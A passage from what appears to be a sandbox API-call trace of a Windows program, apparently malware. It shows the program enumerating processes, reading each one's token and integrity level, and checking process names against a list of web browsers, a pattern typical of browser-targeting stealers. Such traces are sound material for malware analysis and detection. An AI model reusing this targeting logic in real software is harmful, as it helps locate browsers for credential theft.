[0235.275] CloseHandle (hObject=0xb4) returned 1 [0235.275] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.275] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.275] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.275] GetLastError () returned 0x7a [0235.275] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.275] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.275] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.275] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0235.275] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0235.276] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0235.276] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0235.276] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0235.276] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0235.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0235.276] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.276] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.276] GetLastError () returned 0x7a [0235.276] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.276] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.276] CloseHandle (hObject=0xb8) returned 1 [0235.276] CloseHandle (hObject=0xb4) returned 1 [0235.276] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.276] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.276] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.276] GetLastError () returned 0x7a [0235.276] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.276] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.276] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.276] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0235.276] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0235.276] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0235.276] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0235.276] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0235.276] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0235.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0235.276] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.276] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.276] GetLastError () returned 0x7a [0235.276] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.276] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.276] CloseHandle (hObject=0xb8) returned 1 [0235.276] CloseHandle (hObject=0xb4) returned 1 [0235.276] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.276] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.276] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.276] GetLastError () returned 0x7a [0235.276] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.277] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.277] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.277] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0235.277] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0235.277] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0235.277] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0235.277] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0235.277] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0235.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xb4 [0235.277] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.277] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.277] GetLastError () returned 0x7a [0235.277] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.277] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.277] CloseHandle (hObject=0xb8) returned 1 [0235.277] CloseHandle (hObject=0xb4) returned 1 [0235.277] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.277] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.277] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.277] GetLastError () returned 0x7a [0235.277] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.277] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.277] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.277] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0235.277] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0235.277] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0235.277] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0235.277] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0235.277] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0235.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0235.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0235.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0235.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0235.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0235.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0235.277] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.277] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.277] GetLastError () returned 0x7a [0235.277] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.278] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.278] CloseHandle (hObject=0xb8) returned 1 [0235.278] CloseHandle (hObject=0xb4) returned 1 [0235.278] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.278] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.278] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.278] GetLastError () returned 0x7a [0235.278] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.278] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.278] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.278] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0235.278] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0235.278] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0235.278] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0235.278] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0235.278] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0235.278] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.278] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0237.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x4bfd5c | out: SystemInformation=0x0, ResultLength=0x4bfd5c*=0xbe70) returned 0xc0000004 [0237.316] VirtualAlloc (lpAddress=0x0, dwSize=0xce70, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0237.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0xce70, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0237.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0237.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0237.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0237.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0237.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0237.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0237.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0237.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0237.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0237.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0237.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0237.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0237.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0237.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0237.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0237.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0237.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0237.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0237.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0237.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0237.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0237.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0237.317] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.317] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.317] GetLastError () returned 0x7a [0237.317] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.317] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.317] CloseHandle (hObject=0xb8) returned 1 [0237.317] CloseHandle (hObject=0xb4) returned 1 [0237.317] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.317] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.317] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.317] GetLastError () returned 0x7a [0237.317] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.317] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.317] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.317] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0237.317] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0237.318] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0237.318] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0237.318] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0237.318] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0237.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0237.318] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.318] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.318] GetLastError () returned 0x7a [0237.318] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.318] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.318] CloseHandle (hObject=0xb8) returned 1 [0237.318] CloseHandle (hObject=0xb4) returned 1 [0237.318] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.318] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.318] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.318] GetLastError () returned 0x7a [0237.318] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.318] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.318] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.318] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0237.318] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0237.318] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0237.318] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0237.318] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0237.318] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0237.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0237.318] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.318] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.318] GetLastError () returned 0x7a [0237.318] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0237.318] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0237.318] CloseHandle (hObject=0xb8) returned 1 [0237.318] CloseHandle (hObject=0xb4) returned 1 [0237.318] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.318] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0237.319] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0237.319] GetLastError () returned 0x7a [0237.319] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0237.319] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0237.319] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0237.319] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0237.319] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0237.319] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0237.319] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0237.319] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0237.319] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0237.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0237.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0237.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0237.319] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0237.319] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0237.319] GetLastError () returned 0x7a [0237.319] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, 